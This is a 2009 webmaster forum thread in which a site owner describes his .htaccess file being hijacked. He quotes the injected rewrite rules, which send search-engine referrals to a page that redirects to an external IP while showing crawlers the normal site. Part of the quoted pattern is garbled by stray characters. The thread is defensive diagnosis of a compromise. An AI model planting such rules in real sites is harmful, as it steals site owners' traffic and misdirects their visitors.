Welcome to WebmasterWorld Guest from 54.80.103.120
Forum Moderators: phranque
- Your site loads fine
- Your DNS / host is fine
- Your rankings haven't changed
- All your search engine traffic is gone and remaining traffic is mostly direct visitors or referals from a non-search engine site?
Well that's what happened to me.
Upon investigating, I found out the following was added to my .htaccess file:
RewriteCond %{HTTP_REFERER} ^.*(google\.妃sn\.奸ive\.com尖ahoo\.地ltavista\.地ol\.地sk\.圯ureka\.com奸ycos\.com多otbot\.com夷nfoseek\.com安ebcrawler\.圯xcite\.好etscape\.com妃amma\.com地lltheweb\.com好orthernlight\.com字ambler\.ru地port\.ru尖andex\.ru如ingwin\.ru安ww\.ru如unto\.ru存earch\.comcast\.net地bcsok\.no妃yspace\.com奸ooksmart\.com).* [NC]
RewriteRule ^(.*) /501.html [NS,NC,L]
RewriteCond %{HTTP_USER_AGENT} ^.*(bot守rp妃sn).* [NC]
RewriteRule ^(.*) $1 [NS,NC,L]
Redirect /501.html http://<ip removed>
My .htaccess file is not chmodded 777 or anything crazy nor are any other files/folders on my ftp.
I also don't use any open source software (e.g. wordpress, vbulletin, etc.)
I have no clue why this happened to me. I googled the ip address and only found 1 other site that this happened to.
I hope this doesn't happen to you but if it did and you googled the ip I hope you find this thread so you can resolve the issue quickly.
It took me 3 days to figure this out and I lost a lot of traffic and consequently income from this little hijack.
I have asked my host to scan the server for rootkits and I changed my ftp password.
I am still seeking an explanation for how this code ended up in my .htaccess though so any information that may lead to that answer is greatly appreciated.
[edited by: physics at 9:21 pm (utc) on Feb. 12, 2009]
[edited by: phranque at 7:56 am (utc) on Feb. 13, 2009]
[edit reason] IP address removed. No specifics please. [/edit]
The code on his site shared some similarity to what you posted here, in that it was poorly-coded, and probably didn't work quite as intended.
Jim
Just did a full scan with McAfee latest definitions too, nothing found.
In my 12 years online I've never been infected by a virus, I'm pretty careful/aware
Thanks for the replies so far, I appreciate your time and effort
[edited by: phranque at 7:56 am (utc) on Feb. 13, 2009]
[edit reason] No urls, please. See TOS [webmasterworld.com] [/edit]